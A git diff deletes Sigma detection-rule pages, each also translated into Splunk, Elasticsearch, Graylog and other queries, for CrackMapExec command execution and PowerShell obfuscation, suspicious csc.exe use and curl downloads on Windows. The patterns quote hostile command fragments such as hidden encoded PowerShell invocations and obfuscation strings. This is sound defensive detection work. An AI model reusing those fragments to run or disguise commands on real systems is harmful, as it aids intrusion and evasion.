-    "query": "winlog.event_data.CommandLine.keyword:(*cmd.exe\\ \\/Q\\ \\/c\\ *\\ 1>\\ \\\\\\\\*\\\\*\\\\*\\ 2>&1 OR *cmd.exe\\ \\/C\\ *\\ >\\ \\\\\\\\*\\\\*\\\\*\\ 2>&1 OR *cmd.exe\\ \\/C\\ *\\ >\\ *\\\\Temp\\\\*\\ 2>&1 OR *powershell.exe\\ \\-exec\\ bypass\\ \\-noni\\ \\-nop\\ \\-w\\ 1\\ \\-C\\ \\\"* OR *powershell.exe\\ \\-noni\\ \\-nop\\ \\-w\\ 1\\ \\-enc\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*cmd.exe\\ \\/Q\\ \\/c\\ *\\ 1>\\ \\\\\\\\*\\\\*\\\\*\\ 2>&1 OR *cmd.exe\\ \\/C\\ *\\ >\\ \\\\\\\\*\\\\*\\\\*\\ 2>&1 OR *cmd.exe\\ \\/C\\ *\\ >\\ *\\\\Temp\\\\*\\ 2>&1 OR *powershell.exe\\ \\-exec\\ bypass\\ \\-noni\\ \\-nop\\ \\-w\\ 1\\ \\-C\\ \\\"* OR *powershell.exe\\ \\-noni\\ \\-nop\\ \\-w\\ 1\\ \\-enc\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CrackMapExec Command Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*cmd.exe \/Q \/c * 1> \\\\*\\*\\* 2>&1 *cmd.exe \/C * > \\\\*\\*\\* 2>&1 *cmd.exe \/C * > *\\Temp\\* 2>&1 *powershell.exe \-exec bypass \-noni \-nop \-w 1 \-C \"* *powershell.exe \-noni \-nop \-w 1 \-enc *)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1" OR CommandLine="*cmd.exe /C * > \\\\*\\*\\* 2>&1" OR CommandLine="*cmd.exe /C * > *\\Temp\\* 2>&1" OR CommandLine="*powershell.exe -exec bypass -noni -nop -w 1 -C \"*" OR CommandLine="*powershell.exe -noni -nop -w 1 -enc *") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1", "*cmd.exe /C * > \\\\*\\*\\* 2>&1", "*cmd.exe /C * > *\\Temp\\* 2>&1", "*powershell.exe -exec bypass -noni -nop -w 1 -C \"*", "*powershell.exe -noni -nop -w 1 -enc *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*cmd\.exe /Q /c .* 1> \\\\.*\\.*\\.* 2>&1|.*.*cmd\.exe /C .* > \\\\.*\\.*\\.* 2>&1|.*.*cmd\.exe /C .* > .*\\Temp\\.* 2>&1|.*.*powershell\.exe -exec bypass -noni -nop -w 1 -C ".*|.*.*powershell\.exe -noni -nop -w 1 -enc .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_powershell_obfuscation.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_powershell_obfuscation.md
deleted file mode 100644
index 72f883f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_powershell_obfuscation.md
+++ /dev/null
@@ -1,192 +0,0 @@
-| Title                    | CrackMapExec PowerShell Obfuscation       |
-|:-------------------------|:------------------|
-| **Description**          | The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/byt3bl33d3r/CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)</li><li>[https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242](https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CrackMapExec PowerShell Obfuscation
-id: 6f8b3439-a203-45dc-a88b-abf57ea15ccf
-status: experimental
-description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-references:
-    - https://github.com/byt3bl33d3r/CrackMapExec
-    - https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.defense_evasion
-    - attack.t1027
-    - attack.t1059.001
-author: Thomas Patzke
-date: 2020/05/22
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    powershell_execution:
-        CommandLine|contains: 'powershell.exe'
-    snippets:
-        CommandLine|contains:
-            - 'join*split'
-            # Line 343ff
-            - "( $ShellId[1]+$ShellId[13]+'x')"
-            - '( $PSHome[*]+$PSHOME[*]+'
-            - "( $env:Public[13]+$env:Public[5]+'x')"
-            - "( $env:ComSpec[4,*,25]-Join'')"
-            - "[1,3]+'x'-Join'')"
-    condition: powershell_execution and snippets
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*powershell.exe.*" -and ($_.message -match "CommandLine.*.*join.*split.*" -or $_.message -match "CommandLine.*.*( $ShellId[1]\+$ShellId[13]\+'x').*" -or $_.message -match "CommandLine.*.*( $PSHome[.*]\+$PSHOME[.*]\+.*" -or $_.message -match "CommandLine.*.*( $env:Public[13]\+$env:Public[5]\+'x').*" -or $_.message -match "CommandLine.*.*( $env:ComSpec[4,.*,25]-Join'').*" -or $_.message -match "CommandLine.*.*[1,3]\+'x'-Join'').*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*powershell.exe* AND winlog.event_data.CommandLine.keyword:(*join*split* OR *\(\ $ShellId\[1\]\+$ShellId\[13\]\+'x'\)* OR *\(\ $PSHome\[*\]\+$PSHOME\[*\]\+* OR *\(\ $env\:Public\[13\]\+$env\:Public\[5\]\+'x'\)* OR *\(\ $env\:ComSpec\[4,*,25\]\-Join''\)* OR *\[1,3\]\+'x'\-Join''\)*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6f8b3439-a203-45dc-a88b-abf57ea15ccf <<EOF
-{
-  "metadata": {
-    "title": "CrackMapExec PowerShell Obfuscation",
-    "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.defense_evasion",
-      "attack.t1027",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*powershell.exe* AND winlog.event_data.CommandLine.keyword:(*join*split* OR *\\(\\ $ShellId\\[1\\]\\+$ShellId\\[13\\]\\+'x'\\)* OR *\\(\\ $PSHome\\[*\\]\\+$PSHOME\\[*\\]\\+* OR *\\(\\ $env\\:Public\\[13\\]\\+$env\\:Public\\[5\\]\\+'x'\\)* OR *\\(\\ $env\\:ComSpec\\[4,*,25\\]\\-Join''\\)* OR *\\[1,3\\]\\+'x'\\-Join''\\)*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*powershell.exe* AND winlog.event_data.CommandLine.keyword:(*join*split* OR *\\(\\ $ShellId\\[1\\]\\+$ShellId\\[13\\]\\+'x'\\)* OR *\\(\\ $PSHome\\[*\\]\\+$PSHOME\\[*\\]\\+* OR *\\(\\ $env\\:Public\\[13\\]\\+$env\\:Public\\[5\\]\\+'x'\\)* OR *\\(\\ $env\\:ComSpec\\[4,*,25\\]\\-Join''\\)* OR *\\[1,3\\]\\+'x'\\-Join''\\)*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'CrackMapExec PowerShell Obfuscation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*powershell.exe* AND CommandLine.keyword:(*join*split* *\( $ShellId\[1\]\+$ShellId\[13\]\+'x'\)* *\( $PSHome\[*\]\+$PSHOME\[*\]\+* *\( $env\:Public\[13\]\+$env\:Public\[5\]\+'x'\)* *\( $env\:ComSpec\[4,*,25\]\-Join''\)* *\[1,3\]\+'x'\-Join''\)*))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*powershell.exe*" (CommandLine="*join*split*" OR CommandLine="*( $ShellId[1]+$ShellId[13]+'x')*" OR CommandLine="*( $PSHome[*]+$PSHOME[*]+*" OR CommandLine="*( $env:Public[13]+$env:Public[5]+'x')*" OR CommandLine="*( $env:ComSpec[4,*,25]-Join'')*" OR CommandLine="*[1,3]+'x'-Join'')*")) | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*powershell.exe*" CommandLine IN ["*join*split*", "*( $ShellId[1]+$ShellId[13]+'x')*", "*( $PSHome[*]+$PSHOME[*]+*", "*( $env:Public[13]+$env:Public[5]+'x')*", "*( $env:ComSpec[4,*,25]-Join'')*", "*[1,3]+'x'-Join'')*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*powershell\.exe.*)(?=.*(?:.*.*join.*split.*|.*.*\( \$ShellId\[1\]\+\$ShellId\[13\]\+'"'"'x'"'"'\).*|.*.*\( \$PSHome\[.*\]\+\$PSHOME\[.*\]\+.*|.*.*\( \$env:Public\[13\]\+\$env:Public\[5\]\+'"'"'x'"'"'\).*|.*.*\( \$env:ComSpec\[4,.*,25\]-Join'"'"''"'"'\).*|.*.*\[1,3\]\+'"'"'x'"'"'-Join'"'"''"'"'\).*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_csc.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_csc.md
deleted file mode 100644
index 2bc8b1b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_csc.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Suspicious Parent of Csc.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious parent of csc.exe, which could by a sign of payload delivery |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1094924091256176641](https://twitter.com/SBousseaden/status/1094924091256176641)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Parent of Csc.exe
-id: b730a276-6b63-41b8-bcf8-55930c8fc6ee
-description: Detects a suspicious parent of csc.exe, which could by a sign of payload delivery
-status: experimental
-references:
-    - https://twitter.com/SBousseaden/status/1094924091256176641
-author: Florian Roth
-date: 2019/02/11
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\csc.exe*'
-        ParentImage:
-            - '*\wscript.exe'
-            - '*\cscript.exe'
-            - '*\mshta.exe'
-    condition: selection
-falsepositives:
-    - Unkown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\csc.exe.*" -and ($_.message -match "ParentImage.*.*\\wscript.exe" -or $_.message -match "ParentImage.*.*\\cscript.exe" -or $_.message -match "ParentImage.*.*\\mshta.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\csc.exe* AND winlog.event_data.ParentImage.keyword:(*\\wscript.exe OR *\\cscript.exe OR *\\mshta.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b730a276-6b63-41b8-bcf8-55930c8fc6ee <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Parent of Csc.exe",
-    "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\csc.exe* AND winlog.event_data.ParentImage.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\mshta.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\csc.exe* AND winlog.event_data.ParentImage.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\mshta.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Parent of Csc.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\csc.exe* AND ParentImage.keyword:(*\\wscript.exe *\\cscript.exe *\\mshta.exe))
-```
-
-
-### splunk
-    
-```
-(Image="*\\csc.exe*" (ParentImage="*\\wscript.exe" OR ParentImage="*\\cscript.exe" OR ParentImage="*\\mshta.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\csc.exe*" ParentImage IN ["*\\wscript.exe", "*\\cscript.exe", "*\\mshta.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\csc\.exe.*)(?=.*(?:.*.*\wscript\.exe|.*.*\cscript\.exe|.*.*\mshta\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_csc_folder.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_csc_folder.md
deleted file mode 100644
index ca3524d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_csc_folder.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Suspicious Csc.exe Source File Folder       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1500: Compile After Delivery](https://attack.mitre.org/techniques/T1500)</li><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>https://twitter.com/gN3mes1s/status/1206874118282448897</li><li>https://twitter.com/gabriele_pippi/status/1206907900268072962</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/](https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/)</li><li>[https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf](https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf)</li><li>[https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/](https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/)</li><li>[https://twitter.com/gN3mes1s/status/1206874118282448897](https://twitter.com/gN3mes1s/status/1206874118282448897)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Csc.exe Source File Folder
-id: dcaa3f04-70c3-427a-80b4-b870d73c94c4
-description: Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)
-status: experimental
-references:
-    - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/
-    - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-    - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/
-    - https://twitter.com/gN3mes1s/status/1206874118282448897
-author: Florian Roth
-date: 2019/08/24
-modified: 2019/12/17
-tags:
-    - attack.defense_evasion
-    - attack.t1500
-    - attack.t1027
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\csc.exe'
-        CommandLine:
-            - '*\AppData\\*'
-            - '*\Windows\Temp\\*'
-    filter:
-        ParentImage:
-            - 'C:\Program Files*'  # https://twitter.com/gN3mes1s/status/1206874118282448897
-            - '*\sdiagnhost.exe'  # https://twitter.com/gN3mes1s/status/1206874118282448897
-            - '*\w3wp.exe'  # https://twitter.com/gabriele_pippi/status/1206907900268072962
-    condition: selection and not filter
-falsepositives:
-    - https://twitter.com/gN3mes1s/status/1206874118282448897
-    - https://twitter.com/gabriele_pippi/status/1206907900268072962
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\csc.exe" -and ($_.message -match "CommandLine.*.*\\AppData\\.*" -or $_.message -match "CommandLine.*.*\\Windows\\Temp\\.*")) -and  -not (($_.message -match "ParentImage.*C:\\Program Files.*" -or $_.message -match "ParentImage.*.*\\sdiagnhost.exe" -or $_.message -match "ParentImage.*.*\\w3wp.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\csc.exe AND winlog.event_data.CommandLine.keyword:(*\\AppData\\* OR *\\Windows\\Temp\\*)) AND (NOT (winlog.event_data.ParentImage.keyword:(C\:\\Program\ Files* OR *\\sdiagnhost.exe OR *\\w3wp.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/dcaa3f04-70c3-427a-80b4-b870d73c94c4 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Csc.exe Source File Folder",
-    "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1500",
-      "attack.t1027"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\csc.exe AND winlog.event_data.CommandLine.keyword:(*\\\\AppData\\\\* OR *\\\\Windows\\\\Temp\\\\*)) AND (NOT (winlog.event_data.ParentImage.keyword:(C\\:\\\\Program\\ Files* OR *\\\\sdiagnhost.exe OR *\\\\w3wp.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\csc.exe AND winlog.event_data.CommandLine.keyword:(*\\\\AppData\\\\* OR *\\\\Windows\\\\Temp\\\\*)) AND (NOT (winlog.event_data.ParentImage.keyword:(C\\:\\\\Program\\ Files* OR *\\\\sdiagnhost.exe OR *\\\\w3wp.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Csc.exe Source File Folder'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\csc.exe AND CommandLine.keyword:(*\\AppData\\* *\\Windows\\Temp\\*)) AND (NOT (ParentImage.keyword:(C\:\\Program Files* *\\sdiagnhost.exe *\\w3wp.exe))))
-```
-
-
-### splunk
-    
-```
-((Image="*\\csc.exe" (CommandLine="*\\AppData\\*" OR CommandLine="*\\Windows\\Temp\\*")) NOT ((ParentImage="C:\\Program Files*" OR ParentImage="*\\sdiagnhost.exe" OR ParentImage="*\\w3wp.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\csc.exe" CommandLine IN ["*\\AppData\\*", "*\\Windows\\Temp\\*"])  -(ParentImage IN ["C:\\Program Files*", "*\\sdiagnhost.exe", "*\\w3wp.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\csc\.exe)(?=.*(?:.*.*\AppData\\.*|.*.*\Windows\Temp\\.*))))(?=.*(?!.*(?:.*(?=.*(?:.*C:\Program Files.*|.*.*\sdiagnhost\.exe|.*.*\w3wp\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_download.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_download.md
deleted file mode 100644
index 8aadc80..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_download.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Suspicious Curl Usage on Windows       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious curl process start on Windows and outputs the requested document to a local file |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1105: Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1105: Ingress Tool Transfer](../Triggers/T1105.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Scripts created by developers and admins</li><li>Administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/reegun21/status/1222093798009790464](https://twitter.com/reegun21/status/1222093798009790464)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Curl Usage on Windows
-id: e218595b-bbe7-4ee5-8a96-f32a24ad3468
-status: experimental
-description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
-author: Florian Roth
-date: 2020/07/03
-references:
-    - https://twitter.com/reegun21/status/1222093798009790464
-logsource:
-    category: process_creation
-    product: windows
-tags:
-    - attack.defense_evasion
-    - attack.t1105
-detection:
-    selection1:
-        Image|endswith: '\curl.exe'
-    selection2:
-        Product: 'The curl executable'
-    selection3: 
-        CommandLine|contains: ' -O '
-    condition: ( selection1 or selection2 ) and selection3
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Scripts created by developers and admins
-    - Administrative activity
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1") -and ($_.message -match "Image.*.*\\curl.exe" -or $_.message -match "Product.*The curl executable") -and $_.message -match "CommandLine.*.* -O .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\curl.exe OR Product:"The\ curl\ executable") AND winlog.event_data.CommandLine.keyword:*\ \-O\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e218595b-bbe7-4ee5-8a96-f32a24ad3468 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Curl Usage on Windows",
-    "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1105"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\curl.exe OR Product:\"The\\ curl\\ executable\") AND winlog.event_data.CommandLine.keyword:*\\ \\-O\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\curl.exe OR Product:\"The\\ curl\\ executable\") AND winlog.event_data.CommandLine.keyword:*\\ \\-O\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
